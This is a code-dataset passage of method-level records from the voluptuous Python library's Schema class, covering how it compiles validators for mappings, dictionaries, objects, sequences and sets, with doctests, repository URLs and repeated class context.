is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping | Create validator for given mapping. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L305-L436 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_object | python | def _compile_object(self, schema):
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object | Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three')) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L438-L467 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema._compile_dict | python | def _compile_dict(self, schema):
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict | Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"] | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L469-L596 | null | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
